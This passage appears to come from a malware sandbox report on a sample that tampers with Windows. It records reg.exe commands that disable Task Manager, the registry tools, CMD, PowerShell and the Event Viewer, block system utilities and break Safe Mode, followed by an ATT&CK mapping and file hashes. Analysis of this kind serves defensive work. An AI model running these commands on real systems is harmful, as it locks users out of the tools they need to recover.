- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangeTime /t REG_DWORD /d 1 /f
  2⤵
  PID:5980
- C:\Windows\system32\attrib.exe
  attrib -r -s -h "C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf"
  2⤵
  - Views/modifies file attributes
  PID:5008
- C:\Windows\system32\attrib.exe
  attrib +r +s +h "C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf"
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:5192
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:3004
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v DisablePowerShell /t REG_DWORD /d 1 /f
  2⤵
  PID:5388
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Policies\Microsoft\MMC" /v RestrictToPermittedSnapins /t REG_DWORD /d 1 /f
  2⤵
  PID:5456
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  2⤵
  PID:2456
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisablePaint /t REG_DWORD /d 1 /f
  2⤵
  PID:2612
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
  2⤵
  PID:4188
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableStickyKeys /t REG_DWORD /d 1 /f
  2⤵
  PID:5444
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:5488
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisablePerformanceMonitor /t REG_DWORD /d 1 /f
  2⤵
  PID:5500
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:3920
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableMMC /t REG_DWORD /d 1 /f
  2⤵
  PID:5508
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableEventViewer /t REG_DWORD /d 1 /f
  2⤵
  PID:5524
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoWinKeys /t REG_DWORD /d 1 /f
  2⤵
  PID:5544
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableCMD /t REG_DWORD /d 1 /f
  2⤵
  PID:5560
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableSnippingTool /t REG_DWORD /d 1 /f
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5576
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
  2⤵
  PID:5592
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableMagnifier /t REG_DWORD /d 1 /f
  2⤵
  PID:5608
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableEaseOfAccess /t REG_DWORD /d 1 /f
  2⤵
  PID:5468
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "perfmon.msc" /d "" /f
  2⤵
  PID:5640
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "perfmon.exe" /d "" /f
  2⤵
  PID:5668
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "mmc.exe" /d "" /f
  2⤵
  PID:5680
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "mstsc.exe" /d "" /f
  2⤵
  PID:5704
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "mobsync.exe" /d "" /f
  2⤵
  PID:5720
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "SoundRecorder.exe" /d "" /f
  2⤵
  PID:3576
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "displayswitch.exe" /d "" /f
  2⤵
  PID:4552
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "conhost.exe" /d "" /f
  2⤵
  PID:3560
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "taskkill.exe" /d "" /f
  2⤵
  PID:5796
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "tasklist.exe" /d "" /f
  2⤵
  PID:5872
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "iexpress.exe" /d "" /f
  2⤵
  PID:5848
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d "1" /f
  2⤵
  PID:5984
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d "1" /f
  2⤵
  PID:5980
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /v "OptionValue" /t REG_DWORD /d "4" /f
  2⤵
  PID:6080
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network" /v "OptionValue" /t REG_DWORD /d "4" /f
  2⤵
  PID:6128
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRunAs" /t REG_DWORD /d "1" /f
  2⤵
  - Access Token Manipulation: Create Process with Token
  PID:3940
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
  2⤵
  PID:3936
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
  2⤵
  PID:3804
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableMSCONFIG /t REG_DWORD /d 1 /f
  2⤵
  PID:4152
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "FilterAdministratorToken" /t REG_DWORD /d "1" /f
  2⤵
  PID:5160
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2488

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3568

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Tumeg.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:3588

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3512

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4372

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3252

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:756

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:2924

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:4104

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4380

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:5280

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:5788

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:836

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
557df060b24d910f788843324c70707a

SHA1
e5d15be40f23484b3d9b77c19658adcb6e1da45c

SHA256
83cb7d7b4f4a9b084202fef8723df5c5b78f2af1a60e5a4c25a8ed407b5bf53b

SHA512
78df1a48eed7d2d297aa87b41540d64a94f5aa356b9fc5c97b32ab4d58a8bc3ba02ce829aed27d693f7ab01d31d5f2052c3ebf0129f27dd164416ea65edc911c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
49466246aa9c46b768ccb553e4637c69

SHA1
45ae4672cca17acf9bfdf21ff5660b3ae4d59911

SHA256
f968489d33c5c8b6b1d4346326cb9810f798564982b323239e3bda9f97531f70

SHA512
3f17c3b1502412707cf284c35c745f564749f052bfdc408b1aa7deb172c3993fc88b89777c92e9422fdb1556656d25ec3e2dc4f1f9d11f7666af2fa0324fe607

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
843402bd30bd238629acedf42a0dcb51

SHA1
050e6aa6f2c5b862c224e5852cdfb84db9a79bbc

SHA256
692f41363d887f712ab0862a8c317e4b62ba6a0294b238ea8c1ad4ac0fbcda7a

SHA512
977ec0f2943ad3adb9cff7e964d73f3dadc53283329248994f8c6246dfafbf2af3b25818c54f94cc73cd99f01888e84254d5435e28961db40bccbbf24e966167

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
082ed3d8aa2804858f988af762f145fb

SHA1
4aa1e98e3b9dfb3da894eca382a5f159a15e2b6a

SHA256
02c20bec304e5f0a206c9f02a6b37d7ec1ad315ce5c48288490c2ab6b36d2248

SHA512
e1c218b71ce1780a80c4c2efd05a521490a4220dd9ccf641eb526853d0ee00375adae64bc2c7c756ec235de300874f0b24099e58a6096d3011f99f13e42ea07f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\7bd9b553-8d16-4127-8d2e-ebccdb3cff47.tmp

Filesize
4KB

MD5
7ad13fb3593d4480247bd9b224050ead

SHA1
f824eb6db177de21b0537fac35c4270206f01cba

SHA256
d60e96dd2b7e564a386a423ceb72e1443116bf23d70c292a0c4ccaf4261e5644

SHA512
42968951909617d92dfea0d9d8d12a89144f818297a857610201937fa9066de2e9711a02e6f1bc7c2da0ff45305c7170c6bf7ac60812d4bfa74f22c1b8b026e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
85a8927b730d6697c2b3d5fc90c40f7f

SHA1
4a02d72394de6670c802480ce559d2ce3dc26fae

SHA256
3a00b32b8f42e08a802bde56f66b12a78a3e72a598ec4bc83e34e3683b3d59a7

SHA512
15bad567b4bf413695457616008374e53817c59b95fd652bbd8905e6f34ed51370ad890d74e417ff34ac6d8472c70d7a6b5f17335bfde57ea58f30e7a80287f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
552B

MD5
91df32c285392cb147c11cf02869db04

SHA1
b1ab4506402ccb1c77f8b66bd6ea27a57a0ae92e

SHA256
35fcbb339771d331662e79e8fa8e2abc817d2b35e37ea33ac9dbbcf38e3db1fe

SHA512
0e45d429cd66753e106f662d79f09da218112b4e91adc45b8acec2b0ab17a7e4a746f762dcd80ed1c9a3a7f9e06b4bc87b831f79d956f90851ae2ae891aa45db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

Filesize
24KB

MD5
165f7257a3ca2b592ae1c289f58fc69c

SHA1
93fbe405eb7a2b23e20826ce0f2a002bc145d74e

SHA256
cae7a9451d8bc5d80051faba2ed0761b9758afc3698c3fb7c4b4872bd7417525

SHA512
a02b5ba83c968ce8aa9e0a9df9e07a7f05f9debf1c8aaf5d4941943a4d6edb700e641837c6e00e46c961b0b73eae6ff2d15580773b561be38936ce0bbdfc14cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\index

Filesize
256KB

MD5
a5dc2a3deadb3a6b5f8b45e31b4c3aaa

SHA1
7c9a416594e806a87ad8383570a67a04e07b62bf

SHA256
900d7b615ad1b18da4769f97c58511c431ab6fe565f2dc1550ccb40d3e076ebe

SHA512
9d746c97a8a4e89bc087d8ef342f8ad776adeadba2a913d4578717b99035b08aede53969d9d7fe4acf95fab4a969fbba46147a1e30695e1bb60a2fd4d1d7352d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
449baf8a8db29b5c1607d45a125375d4

SHA1
de4ef2466435dd5f0193f25f798640734dfd804f

SHA256
b20a2dbada59c3a1819d69a69b758740cc2e561e22ad51997129f1fa7dfe921b

SHA512
960ae2a74efd7449fc23ff3af38cf86da91db069f632be21a8c58d6cd88176d146ace38c8260d098eb53c9ae6c2b0ea29d405ce59d6c4d75d99593ba0f016750

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
1KB

MD5
04059d22ad53e2624f397d5015783a36

SHA1
03f8d7550bcc16a0bc7076f8d7fbe20dd5b671fb

SHA256
3f45057fb351b0b89b87ebe2bcea8092f09e3a77d638c11b4315742e37a18553

SHA512
9becc8e70e8e0a2ef453f980f630eb925233e314dc72274a168ddb213ee9cd8d39f3f6323866ffca6662e5640d73e11f478ceb0dcc2c238ebe92c5d444b5a6c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
219B

MD5
7a5c15160d599c2d1e94c106549b1ca0

SHA1
d90fc558807da46d23eb169698fd465672aaa054

SHA256
131d5f2599d6c6a87930a7cce3776489f2541cebd2911e569911cd3cbb0d718f

SHA512
06f5b27394dc9e9259c14dc066666d85bb2edaa96b3174d85264a3d84d8cb388b59b9453d794eb258ae01554aa50a471d441cfb486275351131b02f5c88fe780

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
293B

MD5
bdd5fc3d1d0f4196ae3c1a60a5c4a84d

SHA1
32d209765c860553c9b04513d2f81198406c32ce

SHA256
2595c20aeca614d13219b587ff621e67a56911eecf6f72440fac07e03ed85563

SHA512
d49250d89801365740d94fb70ca41e19c8d2a80e9c11c6ab6a33adc6911f9622da39e98e31029e418273ed7bf5c36e923cc938367a2f21ea4042086754c994b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
90c39a07038956a2fd9f81b233485313

SHA1
f301258a812a2bce48c5d8503efe62709de14ab5

SHA256
d6ba9254943862a608743bccb552b43dd6d3ca60f5da774da4a7698f72ab5344

SHA512
060a51fb27fd08f889bca362c35a6810f8aff93147b24b093dfebefd2ccfeb3b5bd9eb0d3f99deb744144cd3bb2a373298b27d339bceeb64280bc870420a16c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c7f5500644225df48f90b71ea7cb8a6c

SHA1
8ebcde484cb6125ab5a2550cb23f2fc9db00f5f7

SHA256
d8cd94e2b9662abb523bf608d4d434f2f022ea7d18f0ea4d95b3909161db3156

SHA512
18374cd07f6ceea2f6fc474de0d2d42472fdabd89fb26545b05e8d7de9c2a04b816a2b79663319cb6d4e092efee1efb5fcfe2d8bd0d819dc70d250f6c51cd429

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
1b5ea86403dd117b021d016e53012922

SHA1
3079657f4c70587b4a9977d61106c6e3f8be17f0

SHA256
1bc5db90cf6f41b52926621c3b9c53e4e4fe89ad65e3c645a943c83d3783a961

SHA512
85193780efa60e55933873386161a76591a3cef3d3f9e064630734fa139dd3accb1e56f97c4b302d3d3d034de99b8cebe23bff3d5e3368430b8954d9f834e96a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
02180121534edb0283373c5c55ce64c3

SHA1
99b80592f0d43827e3b4747956b077cdf5e3a201

SHA256
e047d05ee7e593de65f5ee3c8efa06b06f55af4e927b397408b46300428b1322

SHA512
6ee10481e5f8fbd726d4f1bba4530411a98634ecef02a62ff40d4b6d6e90a91b12e099dc8c7166cc6fce53ccada3075a72313a9370ed7ad204457d785420c136

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
952a6e3cbc50f011cf2f04c9470080ff

SHA1
a0d6a2509af73e523c970f6e4351861bde63d6db

SHA256
faa79ba7dfd140106187ab50f14aa7cca13650f94f796419bc0a44d7a2b79d5f

SHA512
7955092a6086f05268e4b0f88648d9275020b6cad83f81c90eac5a7cd994cc243b8dfab579d4335db62f3577fd2d8a7fbefcad6cc615e2bcf1d014115056cde4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
7ec974d6450b1d66b1603b4d8ab6f311

SHA1
a69718ede5e64505d611081ce519c13bf1874c71

SHA256
c8f35daf396d3857417f59817d58bd0d546a726b6d8a00a8a1c2d158623a721c

SHA512
9a524e266bc6b297d510d791445a6c014684c7d583037e2e40c8ad5e886e49f843662afc3c39cc9c82ae9d165e0a9ef3345dc800eb0655ca70b0769bf207bd2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13376862695319752

Filesize
4KB

MD5
5fc01b721f2b069c56dd013bad7d283a

SHA1
97aedbadad47b1ce24ea9100786591017c9ff360

SHA256
adcc354591bf89de8aad45209aac1e6f15c1a911486a83c73d487b6b3648bfa0

SHA512
a2287a8bc204464aa147363192c8492ebf342cf9dc7fe117399274be7d17a29e82f254cdb1e687117a8ddf8b495c4a184a1b4f00e4bd87f87104d9997ee14d92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
00dd26d8a0cf7d8c46c359fd559c1f93

SHA1
43412afa00f77c7dadfb38058dbc1bdcbe25f877

SHA256
70c7af22276bcc330ac62bfc819f48e4b1ae484a8dcdd64bdc35402c6207e53c

SHA512
be1fdf96c40b498fc36da706df45325b6baba0cabab9823116d1542c5ff6b594e9890fa04eae22ef9e1e8f4a51c4108a1168a5f924fdd0b3a820bf81f9b0dc8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
326B

MD5
ea91f49127db24fe1e8ec2e280c31fd2

SHA1
932246af1507678d986943b51551b8f4babcda87

SHA256
3fe4cccb17f007ed7243bb09c0bb67cf05a38fc5bfd1c57a02f2ff09a827ef62

SHA512
ac343d46a6d3572038533f2bdee71a981214ac999cc18bcbf52f8661c34b801442dffd30e4056c0f0b67d3d494e0ba4d5c93b4d4d0a6292956171e652be9dbff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites

Filesize
20KB

MD5
f44dc73f9788d3313e3e25140002587c

SHA1
5aec4edc356bc673cba64ff31148b934a41d44c4

SHA256
2002c1e5693dd638d840bb9fb04d765482d06ba3106623ce90f6e8e42067a983

SHA512
e556e3c32c0bc142b08e5c479bf31b6101c9200896dd7fcd74fdd39b2daeac8f6dc9ba4f09f3c6715998015af7317211082d9c811e5f9e32493c9ecd888875d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
e2f8136936cb3c43536a0d26729acc3d

SHA1
ae7d3419a6931d954c206555d4c0b37453c4f485

SHA256
8c1e29d9ead16b067e168ef41764f3fcc7edd793383e99e9148dff3f56152803

SHA512
450ba4f1c7778384d88415a47287fa825587c2c23ee184de98fd3bb4e2b227dbd39916482e9a6da60ffa09879d726ac7f90d9232678038987b6f414dcecec3b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

Filesize
128KB

MD5
8b6365b4ff8a4b6b7dcc7dbfdee9b359

SHA1
6fa27765192befafabbb36c6b94cdd7a8753b564

SHA256
c1802a69c12f47887cf246622dba9ff3a09dfb803cdd81d5895fc4a35b0bb2f0

SHA512
d4f8e5f6394c49a27a3f742f318fd5c6be29586402da0bd86ff1f468fcb59294d5257324a7eb57e023a40dc4cddd6c4d7bccb6e110e93c9caba24e31ae3ff1c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Filesize
116KB

MD5
2cd14eead7ea951f8198eeacfde2698b

SHA1
576cef7ff6a99947c29387be3fada4482cbb5dc4

SHA256
1c8a02d86bb8d486abdaf6b74b3dca04d10981c911d42efd4a0702a8d96cd934

SHA512
4e16189df44be584e578e022992beffa8c0433925573740ee135242f0a01d9676fda5cde68a86f246ecc8c792153b30cd5f3b03031263ecbd94370e076be5475

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
44KB

MD5
41e2ab167a0920fc967f375ea7f39011

SHA1
107872d3e33a58f7f964110f4604ffb9a4e65d67

SHA256
3a17735bb2daa82ef70a9e0dac64aa5873ff352c8c1b91a851592d0583d53da9

SHA512
d9dbef336dc5d5d589d286f0ab9a98c00f04a877301a039811e0e418a911e7b8644280295fe699f1ab7378bdb73104a046121cf62a5adf5e73d8473af10c34e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000001.dbtmp

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
e1b40379e143c23dd04a697932a79fb1

SHA1
b3d56b8640a0e3f17b35b0c6549279734d0ebbe0

SHA256
d4b9bd6d4e12f9597d3f9a76ab189dee4c01418beaf9f9d6180bbd66bcdd3f05

SHA512
77172940978c3959ddd537d9d3b7377dc77f3fe170e2e15253c2fcd2277656aa69259e4e1555ab9ce26a02394220f297df2e26e6fe0534af7ec09143095514bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
c7c5b73c24529e2e8fe472da8279d4ec

SHA1
13f6de826220673080ee5a9be83b46f5134ccb22

SHA256
75b788b0e52e7c950beeec7ebf96ae33d19693da56c81f047ba85bc7f1cd6a45

SHA512
